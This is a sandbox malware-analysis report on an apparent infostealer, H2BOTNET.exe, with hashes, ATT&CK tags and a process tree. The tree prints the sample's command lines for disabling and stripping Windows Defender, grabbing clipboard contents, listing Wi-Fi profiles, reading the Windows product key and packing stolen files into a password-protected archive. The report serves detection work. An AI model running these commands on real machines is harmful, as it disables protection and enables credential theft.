Windows 7 deprecation
Windows 7 will be removed from tria.ge on 2025-03-31
Analysis
-
max time kernel
93s -
max time network
124s -
platform
windows10-2004_x64 -
resource
win10v2004-20250129-en -
resource tags
arch:x64arch:x86image:win10v2004-20250129-enlocale:en-usos:windows10-2004-x64system -
submitted
31/01/2025, 11:01
Behavioral task
behavioral1
Sample
H2BOTNET.exe
Resource
win7-20240903-en
Behavioral task
behavioral2
Sample
H2BOTNET.exe
Resource
win10v2004-20250129-en
General
-
Target
H2BOTNET.exe
-
Size
5.9MB
-
MD5
6121d9793742fd2ffbc985d0dad01a58
-
SHA1
27fb444e6f7f838a02ee0d88fe111ca6b53faf03
-
SHA256
5deb8f3ed733f1d73547bcd154f37f5cf991912f3bf7c6575dca700ea7c37b52
-
SHA512
40cd64c1bda206579a7c52cb269750d641b388efd719f6f1a03134a2f33e9b28774cf89a38673ace5ca47d0b5904ef83802f2d7d2dede088a9dd0bfcb39c6e6a
-
SSDEEP
98304:OVDe7pzWqi8MMhJMjarCtaCObO/OH9KkqQz4W1kgeDbFM6+3RM55eE:OwNzW4B6yA+KO0WRqi6955eE
Malware Config
Signatures
-
Command and Scripting Interpreter: PowerShell 1 TTPs 3 IoCs
Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.
pid Process 5076 powershell.exe 4432 powershell.exe 4904 powershell.exe -
Clipboard Data 1 TTPs 2 IoCs
Adversaries may collect data stored in the clipboard from users copying information within or between applications.
pid Process 3392 cmd.exe 1156 powershell.exe -
Executes dropped EXE 1 IoCs
pid Process 2812 rar.exe -
Loads dropped DLL 17 IoCs
pid Process 4404 H2BOTNET.exe 4404 H2BOTNET.exe 4404 H2BOTNET.exe 4404 H2BOTNET.exe 4404 H2BOTNET.exe 4404 H2BOTNET.exe 4404 H2BOTNET.exe 4404 H2BOTNET.exe 4404 H2BOTNET.exe 4404 H2BOTNET.exe 4404 H2BOTNET.exe 4404 H2BOTNET.exe 4404 H2BOTNET.exe 4404 H2BOTNET.exe 4404 H2BOTNET.exe 4404 H2BOTNET.exe 4404 H2BOTNET.exe -
Reads user/profile data of web browsers 3 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Unsecured Credentials: Credentials In Files 1 TTPs
Steal credentials from unsecured files.
-
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
-
Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs
flow ioc 18 discord.com 20 discord.com -
Looks up external IP address via web service 1 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
flow ioc 16 ip-api.com -
Enumerates processes with tasklist 1 TTPs 3 IoCs
pid Process 4300 tasklist.exe 1412 tasklist.exe 2844 tasklist.exe -
resource yara_rule behavioral2/files/0x0007000000023c61-21.dat upx behavioral2/memory/4404-25-0x00007FFD8ADC0000-0x00007FFD8B226000-memory.dmp upx behavioral2/files/0x0007000000023c54-27.dat upx behavioral2/files/0x0007000000023c5f-29.dat upx behavioral2/files/0x0007000000023c5b-47.dat upx behavioral2/memory/4404-48-0x00007FFDA2E40000-0x00007FFDA2E4F000-memory.dmp upx behavioral2/files/0x0007000000023c5a-46.dat upx behavioral2/files/0x0007000000023c59-45.dat upx behavioral2/files/0x0007000000023c58-44.dat upx behavioral2/files/0x0007000000023c57-43.dat upx behavioral2/files/0x0007000000023c56-42.dat upx behavioral2/files/0x0007000000023c55-41.dat upx behavioral2/files/0x0007000000023c53-40.dat upx behavioral2/files/0x0007000000023c66-39.dat upx behavioral2/files/0x0007000000023c65-38.dat upx behavioral2/files/0x0007000000023c64-37.dat upx behavioral2/files/0x0007000000023c60-34.dat upx behavioral2/files/0x0007000000023c5e-33.dat upx behavioral2/memory/4404-30-0x00007FFDA01A0000-0x00007FFDA01C4000-memory.dmp upx behavioral2/memory/4404-54-0x00007FFDA1C70000-0x00007FFDA1C9C000-memory.dmp upx behavioral2/memory/4404-56-0x00007FFDA0070000-0x00007FFDA0088000-memory.dmp upx behavioral2/memory/4404-58-0x00007FFD9EF50000-0x00007FFD9EF6F000-memory.dmp upx behavioral2/memory/4404-60-0x00007FFD8AAA0000-0x00007FFD8AC1D000-memory.dmp upx behavioral2/memory/4404-62-0x00007FFD9EE50000-0x00007FFD9EE69000-memory.dmp upx behavioral2/memory/4404-64-0x00007FFD9EF40000-0x00007FFD9EF4D000-memory.dmp upx behavioral2/memory/4404-66-0x00007FFD9A2F0000-0x00007FFD9A31E000-memory.dmp upx behavioral2/memory/4404-74-0x00007FFD8A720000-0x00007FFD8AA95000-memory.dmp upx behavioral2/memory/4404-73-0x00007FFDA01A0000-0x00007FFDA01C4000-memory.dmp upx behavioral2/memory/4404-71-0x00007FFD9A110000-0x00007FFD9A1C8000-memory.dmp upx behavioral2/memory/4404-68-0x00007FFD8ADC0000-0x00007FFD8B226000-memory.dmp upx behavioral2/memory/4404-76-0x00007FFD9A2D0000-0x00007FFD9A2E5000-memory.dmp upx behavioral2/memory/4404-78-0x00007FFD9B0E0000-0x00007FFD9B0ED000-memory.dmp upx behavioral2/memory/4404-81-0x00007FFD8A200000-0x00007FFD8A318000-memory.dmp upx behavioral2/memory/4404-80-0x00007FFDA0070000-0x00007FFDA0088000-memory.dmp upx behavioral2/memory/4404-106-0x00007FFD9EF50000-0x00007FFD9EF6F000-memory.dmp upx behavioral2/memory/4404-141-0x00007FFD8AAA0000-0x00007FFD8AC1D000-memory.dmp upx behavioral2/memory/4404-158-0x00007FFD9EE50000-0x00007FFD9EE69000-memory.dmp upx behavioral2/memory/4404-159-0x00007FFD9EF40000-0x00007FFD9EF4D000-memory.dmp upx behavioral2/memory/4404-174-0x00007FFD9A2F0000-0x00007FFD9A31E000-memory.dmp upx behavioral2/memory/4404-175-0x00007FFD9A110000-0x00007FFD9A1C8000-memory.dmp upx behavioral2/memory/4404-188-0x00007FFD8A720000-0x00007FFD8AA95000-memory.dmp upx behavioral2/memory/4404-214-0x00007FFD8A200000-0x00007FFD8A318000-memory.dmp upx behavioral2/memory/4404-200-0x00007FFD8ADC0000-0x00007FFD8B226000-memory.dmp upx behavioral2/memory/4404-206-0x00007FFD8AAA0000-0x00007FFD8AC1D000-memory.dmp upx behavioral2/memory/4404-205-0x00007FFD9EF50000-0x00007FFD9EF6F000-memory.dmp upx behavioral2/memory/4404-201-0x00007FFDA01A0000-0x00007FFDA01C4000-memory.dmp upx behavioral2/memory/4404-215-0x00007FFD8ADC0000-0x00007FFD8B226000-memory.dmp upx behavioral2/memory/4404-230-0x00007FFDA01A0000-0x00007FFDA01C4000-memory.dmp upx behavioral2/memory/4404-243-0x00007FFD8A200000-0x00007FFD8A318000-memory.dmp upx behavioral2/memory/4404-242-0x00007FFD9B0E0000-0x00007FFD9B0ED000-memory.dmp upx behavioral2/memory/4404-241-0x00007FFD9A2D0000-0x00007FFD9A2E5000-memory.dmp upx behavioral2/memory/4404-240-0x00007FFD9A110000-0x00007FFD9A1C8000-memory.dmp upx behavioral2/memory/4404-239-0x00007FFD8A720000-0x00007FFD8AA95000-memory.dmp upx behavioral2/memory/4404-238-0x00007FFD9A2F0000-0x00007FFD9A31E000-memory.dmp upx behavioral2/memory/4404-237-0x00007FFD9EF40000-0x00007FFD9EF4D000-memory.dmp upx behavioral2/memory/4404-236-0x00007FFD9EE50000-0x00007FFD9EE69000-memory.dmp upx behavioral2/memory/4404-235-0x00007FFD8AAA0000-0x00007FFD8AC1D000-memory.dmp upx behavioral2/memory/4404-234-0x00007FFD9EF50000-0x00007FFD9EF6F000-memory.dmp upx behavioral2/memory/4404-233-0x00007FFDA0070000-0x00007FFDA0088000-memory.dmp upx behavioral2/memory/4404-232-0x00007FFDA1C70000-0x00007FFDA1C9C000-memory.dmp upx behavioral2/memory/4404-231-0x00007FFDA2E40000-0x00007FFDA2E4F000-memory.dmp upx -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Event Triggered Execution: Netsh Helper DLL 1 TTPs 3 IoCs
Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system.
description ioc Process Key opened \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh netsh.exe -
System Network Configuration Discovery: Wi-Fi Discovery 1 TTPs 2 IoCs
Adversaries may search for information about Wi-Fi networks, such as network names and passwords, on compromised systems.
pid Process 3604 cmd.exe 4080 netsh.exe -
Detects videocard installed 1 TTPs 1 IoCs
Uses WMIC.exe to determine videocard installed.
pid Process 5028 WMIC.exe -
Gathers system information 1 TTPs 1 IoCs
Runs systeminfo.exe.
pid Process 412 systeminfo.exe -
Suspicious behavior: EnumeratesProcesses 11 IoCs
pid Process 5076 powershell.exe 4432 powershell.exe 5076 powershell.exe 4432 powershell.exe 1156 powershell.exe 1156 powershell.exe 1156 powershell.exe 4904 powershell.exe 4904 powershell.exe 4500 powershell.exe 4500 powershell.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
description pid Process Token: SeDebugPrivilege 5076 powershell.exe Token: SeDebugPrivilege 4432 powershell.exe Token: SeDebugPrivilege 2844 tasklist.exe Token: SeDebugPrivilege 1412 tasklist.exe Token: SeIncreaseQuotaPrivilege 224 WMIC.exe Token: SeSecurityPrivilege 224 WMIC.exe Token: SeTakeOwnershipPrivilege 224 WMIC.exe Token: SeLoadDriverPrivilege 224 WMIC.exe Token: SeSystemProfilePrivilege 224 WMIC.exe Token: SeSystemtimePrivilege 224 WMIC.exe Token: SeProfSingleProcessPrivilege 224 WMIC.exe Token: SeIncBasePriorityPrivilege 224 WMIC.exe Token: SeCreatePagefilePrivilege 224 WMIC.exe Token: SeBackupPrivilege 224 WMIC.exe Token: SeRestorePrivilege 224 WMIC.exe Token: SeShutdownPrivilege 224 WMIC.exe Token: SeDebugPrivilege 224 WMIC.exe Token: SeSystemEnvironmentPrivilege 224 WMIC.exe Token: SeRemoteShutdownPrivilege 224 WMIC.exe Token: SeUndockPrivilege 224 WMIC.exe Token: SeManageVolumePrivilege 224 WMIC.exe Token: 33 224 WMIC.exe Token: 34 224 WMIC.exe Token: 35 224 WMIC.exe Token: 36 224 WMIC.exe Token: SeDebugPrivilege 4300 tasklist.exe Token: SeDebugPrivilege 1156 powershell.exe Token: SeIncreaseQuotaPrivilege 224 WMIC.exe Token: SeSecurityPrivilege 224 WMIC.exe Token: SeTakeOwnershipPrivilege 224 WMIC.exe Token: SeLoadDriverPrivilege 224 WMIC.exe Token: SeSystemProfilePrivilege 224 WMIC.exe Token: SeSystemtimePrivilege 224 WMIC.exe Token: SeProfSingleProcessPrivilege 224 WMIC.exe Token: SeIncBasePriorityPrivilege 224 WMIC.exe Token: SeCreatePagefilePrivilege 224 WMIC.exe Token: SeBackupPrivilege 224 WMIC.exe Token: SeRestorePrivilege 224 WMIC.exe Token: SeShutdownPrivilege 224 WMIC.exe Token: SeDebugPrivilege 224 WMIC.exe Token: SeSystemEnvironmentPrivilege 224 WMIC.exe Token: SeRemoteShutdownPrivilege 224 WMIC.exe Token: SeUndockPrivilege 224 WMIC.exe Token: SeManageVolumePrivilege 224 WMIC.exe Token: 33 224 WMIC.exe Token: 34 224 WMIC.exe Token: 35 224 WMIC.exe Token: 36 224 WMIC.exe Token: SeIncreaseQuotaPrivilege 2312 WMIC.exe Token: SeSecurityPrivilege 2312 WMIC.exe Token: SeTakeOwnershipPrivilege 2312 WMIC.exe Token: SeLoadDriverPrivilege 2312 WMIC.exe Token: SeSystemProfilePrivilege 2312 WMIC.exe Token: SeSystemtimePrivilege 2312 WMIC.exe Token: SeProfSingleProcessPrivilege 2312 WMIC.exe Token: SeIncBasePriorityPrivilege 2312 WMIC.exe Token: SeCreatePagefilePrivilege 2312 WMIC.exe Token: SeBackupPrivilege 2312 WMIC.exe Token: SeRestorePrivilege 2312 WMIC.exe Token: SeShutdownPrivilege 2312 WMIC.exe Token: SeDebugPrivilege 2312 WMIC.exe Token: SeSystemEnvironmentPrivilege 2312 WMIC.exe Token: SeRemoteShutdownPrivilege 2312 WMIC.exe Token: SeUndockPrivilege 2312 WMIC.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 4496 wrote to memory of 4404 4496 H2BOTNET.exe 83 PID 4496 wrote to memory of 4404 4496 H2BOTNET.exe 83 PID 4404 wrote to memory of 2896 4404 H2BOTNET.exe 87 PID 4404 wrote to memory of 2896 4404 H2BOTNET.exe 87 PID 4404 wrote to memory of 2932 4404 H2BOTNET.exe 88 PID 4404 wrote to memory of 2932 4404 H2BOTNET.exe 88 PID 2932 wrote to memory of 4432 2932 cmd.exe 91 PID 2932 wrote to memory of 4432 2932 cmd.exe 91 PID 2896 wrote to memory of 5076 2896 cmd.exe 92 PID 2896 wrote to memory of 5076 2896 cmd.exe 92 PID 4404 wrote to memory of 628 4404 H2BOTNET.exe 93 PID 4404 wrote to memory of 628 4404 H2BOTNET.exe 93 PID 4404 wrote to memory of 2760 4404 H2BOTNET.exe 94 PID 4404 wrote to memory of 2760 4404 H2BOTNET.exe 94 PID 628 wrote to memory of 1412 628 cmd.exe 97 PID 628 wrote to memory of 1412 628 cmd.exe 97 PID 2760 wrote to memory of 2844 2760 cmd.exe 98 PID 2760 wrote to memory of 2844 2760 cmd.exe 98 PID 4404 wrote to memory of 2512 4404 H2BOTNET.exe 100 PID 4404 wrote to memory of 2512 4404 H2BOTNET.exe 100 PID 4404 wrote to memory of 3392 4404 H2BOTNET.exe 101 PID 4404 wrote to memory of 3392 4404 H2BOTNET.exe 101 PID 4404 wrote to memory of 2112 4404 H2BOTNET.exe 103 PID 4404 wrote to memory of 2112 4404 H2BOTNET.exe 103 PID 4404 wrote to memory of 4044 4404 H2BOTNET.exe 104 PID 4404 wrote to memory of 4044 4404 H2BOTNET.exe 104 PID 2512 wrote to memory of 224 2512 cmd.exe 108 PID 2512 wrote to memory of 224 2512 cmd.exe 108 PID 2112 wrote to memory of 4300 2112 cmd.exe 109 PID 2112 wrote to memory of 4300 2112 cmd.exe 109 PID 4044 wrote to memory of 4108 4044 cmd.exe 110 PID 4044 wrote to memory of 4108 4044 cmd.exe 110 PID 3392 wrote to memory of 1156 3392 cmd.exe 111 PID 3392 wrote to memory of 1156 3392 cmd.exe 111 PID 4404 wrote to memory of 3604 4404 H2BOTNET.exe 112 PID 4404 wrote to memory of 3604 4404 H2BOTNET.exe 112 PID 4404 wrote to memory of 4116 4404 H2BOTNET.exe 113 PID 4404 wrote to memory of 4116 4404 H2BOTNET.exe 113 PID 4404 wrote to memory of 2652 4404 H2BOTNET.exe 116 PID 4404 wrote to memory of 2652 4404 H2BOTNET.exe 116 PID 4116 wrote to memory of 412 4116 cmd.exe 118 PID 4116 wrote to memory of 412 4116 cmd.exe 118 PID 3604 wrote to memory of 4080 3604 cmd.exe 119 PID 3604 wrote to memory of 4080 3604 cmd.exe 119 PID 2652 wrote to memory of 4844 2652 cmd.exe 120 PID 2652 wrote to memory of 4844 2652 cmd.exe 120 PID 4404 wrote to memory of 2908 4404 H2BOTNET.exe 121 PID 4404 wrote to memory of 2908 4404 H2BOTNET.exe 121 PID 2908 wrote to memory of 4576 2908 cmd.exe 123 PID 2908 wrote to memory of 4576 2908 cmd.exe 123 PID 4404 wrote to memory of 2240 4404 H2BOTNET.exe 124 PID 4404 wrote to memory of 2240 4404 H2BOTNET.exe 124 PID 2240 wrote to memory of 2696 2240 cmd.exe 126 PID 2240 wrote to memory of 2696 2240 cmd.exe 126 PID 4404 wrote to memory of 2060 4404 H2BOTNET.exe 127 PID 4404 wrote to memory of 2060 4404 H2BOTNET.exe 127 PID 2060 wrote to memory of 3528 2060 cmd.exe 129 PID 2060 wrote to memory of 3528 2060 cmd.exe 129 PID 4404 wrote to memory of 1564 4404 H2BOTNET.exe 130 PID 4404 wrote to memory of 1564 4404 H2BOTNET.exe 130 PID 1564 wrote to memory of 1828 1564 cmd.exe 132 PID 1564 wrote to memory of 1828 1564 cmd.exe 132 PID 4404 wrote to memory of 2168 4404 H2BOTNET.exe 134 PID 4404 wrote to memory of 2168 4404 H2BOTNET.exe 134
Processes
-
C:\Users\Admin\AppData\Local\Temp\H2BOTNET.exe"C:\Users\Admin\AppData\Local\Temp\H2BOTNET.exe"1⤵
- Suspicious use of WriteProcessMemory
PID:4496 -
C:\Users\Admin\AppData\Local\Temp\H2BOTNET.exe"C:\Users\Admin\AppData\Local\Temp\H2BOTNET.exe"2⤵
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:4404 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\H2BOTNET.exe'"3⤵
- Suspicious use of WriteProcessMemory
PID:2896 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\H2BOTNET.exe'4⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:5076
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"3⤵
- Suspicious use of WriteProcessMemory
PID:2932 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend4⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4432
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "tasklist /FO LIST"3⤵
- Suspicious use of WriteProcessMemory
PID:628 -
C:\Windows\system32\tasklist.exetasklist /FO LIST4⤵
- Enumerates processes with tasklist
- Suspicious use of AdjustPrivilegeToken
PID:1412
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "tasklist /FO LIST"3⤵
- Suspicious use of WriteProcessMemory
PID:2760 -
C:\Windows\system32\tasklist.exetasklist /FO LIST4⤵
- Enumerates processes with tasklist
- Suspicious use of AdjustPrivilegeToken
PID:2844
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName"3⤵
- Suspicious use of WriteProcessMemory
PID:2512 -
C:\Windows\System32\Wbem\WMIC.exeWMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName4⤵
- Suspicious use of AdjustPrivilegeToken
PID:224
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "powershell Get-Clipboard"3⤵
- Clipboard Data
- Suspicious use of WriteProcessMemory
PID:3392 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Get-Clipboard4⤵
- Clipboard Data
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1156
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "tasklist /FO LIST"3⤵
- Suspicious use of WriteProcessMemory
PID:2112 -
C:\Windows\system32\tasklist.exetasklist /FO LIST4⤵
- Enumerates processes with tasklist
- Suspicious use of AdjustPrivilegeToken
PID:4300
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "tree /A /F"3⤵
- Suspicious use of WriteProcessMemory
PID:4044 -
C:\Windows\system32\tree.comtree /A /F4⤵PID:4108
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "netsh wlan show profile"3⤵
- System Network Configuration Discovery: Wi-Fi Discovery
- Suspicious use of WriteProcessMemory
PID:3604 -
C:\Windows\system32\netsh.exenetsh wlan show profile4⤵
- Event Triggered Execution: Netsh Helper DLL
- System Network Configuration Discovery: Wi-Fi Discovery
PID:4080
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "systeminfo"3⤵
- Suspicious use of WriteProcessMemory
PID:4116 -
C:\Windows\system32\systeminfo.exesysteminfo4⤵
- Gathers system information
PID:412
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "tree /A /F"3⤵
- Suspicious use of WriteProcessMemory
PID:2652 -
C:\Windows\system32\tree.comtree /A /F4⤵PID:4844
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "tree /A /F"3⤵
- Suspicious use of WriteProcessMemory
PID:2908 -
C:\Windows\system32\tree.comtree /A /F4⤵PID:4576
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "tree /A /F"3⤵
- Suspicious use of WriteProcessMemory
PID:2240 -
C:\Windows\system32\tree.comtree /A /F4⤵PID:2696
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "tree /A /F"3⤵
- Suspicious use of WriteProcessMemory
PID:2060 -
C:\Windows\system32\tree.comtree /A /F4⤵PID:3528
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "tree /A /F"3⤵
- Suspicious use of WriteProcessMemory
PID:1564 -
C:\Windows\system32\tree.comtree /A /F4⤵PID:1828
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "getmac"3⤵PID:2168
-
C:\Windows\system32\getmac.exegetmac4⤵PID:2548
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\_MEI44962\rar.exe a -r -hp"ak" "C:\Users\Admin\AppData\Local\Temp\YLm4s.zip" *"3⤵PID:4092
-
C:\Users\Admin\AppData\Local\Temp\_MEI44962\rar.exeC:\Users\Admin\AppData\Local\Temp\_MEI44962\rar.exe a -r -hp"ak" "C:\Users\Admin\AppData\Local\Temp\YLm4s.zip" *4⤵
- Executes dropped EXE
PID:2812
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "wmic os get Caption"3⤵PID:4108
-
C:\Windows\System32\Wbem\WMIC.exewmic os get Caption4⤵
- Suspicious use of AdjustPrivilegeToken
PID:2312
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "wmic computersystem get totalphysicalmemory"3⤵PID:4884
-
C:\Windows\System32\Wbem\WMIC.exewmic computersystem get totalphysicalmemory4⤵PID:2512
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"3⤵PID:3568
-
C:\Windows\System32\Wbem\WMIC.exewmic csproduct get uuid4⤵PID:208
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER"3⤵PID:2908
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER4⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
PID:4904
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"3⤵PID:1896
-
C:\Windows\System32\Wbem\WMIC.exewmic path win32_VideoController get name4⤵
- Detects videocard installed
PID:5028
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault"3⤵PID:4932
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault4⤵
- Suspicious behavior: EnumeratesProcesses
PID:4500
-
-
-
Network
MITRE ATT&CK Enterprise v15
Credential Access
Credentials from Password Stores
1Credentials from Web Browsers
1Unsecured Credentials
3Credentials In Files
3Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
2KB
MD5d85ba6ff808d9e5444a4b369f5bc2730
SHA131aa9d96590fff6981b315e0b391b575e4c0804a
SHA25684739c608a73509419748e4e20e6cc4e1846056c3fe1929a8300d5a1a488202f
SHA5128c414eb55b45212af385accc16d9d562adba2123583ce70d22b91161fe878683845512a78f04dedd4ea98ed9b174dbfa98cf696370598ad8e6fbd1e714f1f249
-
Filesize
944B
MD56d3e9c29fe44e90aae6ed30ccf799ca8
SHA1c7974ef72264bbdf13a2793ccf1aed11bc565dce
SHA2562360634e63e8f0b5748e2c56ebb8f4aa78e71008ea7b5c9ca1c49be03b49557d
SHA51260c38c4367352537545d859f64b9c5cbada94240478d1d039fd27b5ecba4dc1c90051557c16d802269703b873546ead416279c0a80c6fd5e49ad361cef22596a
-
Filesize
64B
MD5dc7bf9814cb20bd020db0d2ef94ecd83
SHA1300c2a2254ca62f19a7b2f94ace04be029f066df
SHA2569aa35faf20a98c757ff13e045aae9a028fd78a95e164357c413c49daf1d30233
SHA512ad391353b8bca57904a2e91895f2c60d22b0837d612e276448a59f244624ffd71e079dbf96d66111eefdf5886632fe6dc8612a82c59dd58b7db7de78bfeabb03
-
Filesize
64B
MD5446dd1cf97eaba21cf14d03aebc79f27
SHA136e4cc7367e0c7b40f4a8ace272941ea46373799
SHA256a7de5177c68a64bd48b36d49e2853799f4ebcfa8e4761f7cc472f333dc5f65cf
SHA512a6d754709f30b122112ae30e5ab22486393c5021d33da4d1304c061863d2e1e79e8aeb029cae61261bb77d0e7becd53a7b0106d6ea4368b4c302464e3d941cf7
-
Filesize
5KB
MD5bf46a33e743530c5069ee8f242db1b74
SHA1782a5b896048a8d1831abf1b3b69f025ee2ceba7
SHA2562e7f140fe7c26307685c34e93c225abe2d0694f2160b9ad99558ba6516207104
SHA5126903ae2e6e908d7e960e2090cacd881cc736e965654e97de73d0c21b7b15af670ce04516c99e8eda59d4aef21ef8dd9dc6e401ebff9efac27dba628245ac0e76
-
Filesize
95KB
MD5f34eb034aa4a9735218686590cba2e8b
SHA12bc20acdcb201676b77a66fa7ec6b53fa2644713
SHA2569d2b40f0395cc5d1b4d5ea17b84970c29971d448c37104676db577586d4ad1b1
SHA512d27d5e65e8206bd7923cf2a3c4384fec0fc59e8bc29e25f8c03d039f3741c01d1a8c82979d7b88c10b209db31fbbec23909e976b3ee593dc33481f0050a445af
-
Filesize
47KB
MD5f6e387f20808828796e876682a328e98
SHA16679ae43b0634ac706218996bac961bef4138a02
SHA2568886bd30421c6c6bfae17847002b9bf4ee4d9eee1a3be7369ee66b36e26c372b
SHA512ad7cf281f2d830f9dbf66d8ef50e418b4a17a0144b6616c43d7e98b00e6f0cbafc6fe4aba4fabf2f008bb0df85553614b38ae303e5726621a804051d950e744e
-
Filesize
58KB
MD548ce90022e97f72114a95630ba43b8fb
SHA1f2eba0434ec204d8c6ca4f01af33ef34f09b52fd
SHA2565998de3112a710248d29df76a05272775bf08a8dbc5a051a7ecb909fef069635
SHA5127e6c2591805136f74c413b9633d5fdc4428e6f01e0e632b278bee98170b4f418ef2afd237c09e60b0e72076924ed0e3ffb0e2453e543b5e030b263f64568fab8
-
Filesize
105KB
MD52030438e4f397a7d4241a701a3ca2419
SHA128b8d06135cd1f784ccabda39432cc83ba22daf7
SHA25607d7ac065f25af2c7498d5d93b1551cc43a4d4b5e8fb2f9293b647d0f7bd7c72
SHA512767f2a9f9eef6ebeca95ab9652b7d0976f2ac87b9e9da1dbd3c4ccf58e8ecb0da8242f4df0b07612282c16ba85197ed0296d1052027cd48b96d61bdf678abaad
-
Filesize
35KB
MD513f99120a244ab62af1684fbbc5d5a7e
SHA15147a90082eb3cd2c34b7f2deb8a4ef24d7ae724
SHA25611658b52e7166da976abeeed78a940d69b2f11f518046877bea799759a17f58b
SHA51246c2f9f43df6de72458ed24c2a0433a6092fd5b49b3234135f06c19a80f18f8bdbfb297e5a411cf29f8c60af342c80db123959f7317cfa045c73bd6f835eb22d
-
Filesize
85KB
MD57c66f33a67fbb4d99041f085ef3c6428
SHA1e1384891df177b45b889459c503985b113e754a3
SHA25632f911e178fa9e4db9bd797598f84f9896f99e5022f2b76a1589b81f686b0866
SHA512d0caabd031fa0c63f4cfb79d8f3531ad85eda468d77a78dd3dde40ce9ac2d404fc0099c4f67579aa802fe5c6c6a464894fd88c19f1fc601f26189780b36f3f9d
-
Filesize
25KB
MD5f9d8b75ccb258b8bc4eef7311c6d611d
SHA11b48555c39a36f035699189329cda133b63e36b5
SHA256b3d9763fc71b001a1a2cc430946933e3832f859eb7857b590f8daeef8017179c
SHA512cbf8490501b002eec96ae6c1fa4f3684aa1cab1e63025087df92c0e857299b9b498bff91c1f301f926ff86e0dc81e8f0c17db992366bed3cd9f41bcae43542db
-
Filesize
42KB
MD50dd957099cf15d172d0a343886fb7c66
SHA1950f7f15c6accffac699c5db6ce475365821b92a
SHA2568142d92dc7557e8c585ea9ee41146b77864b7529ed464fdf51dfb6d797828a4a
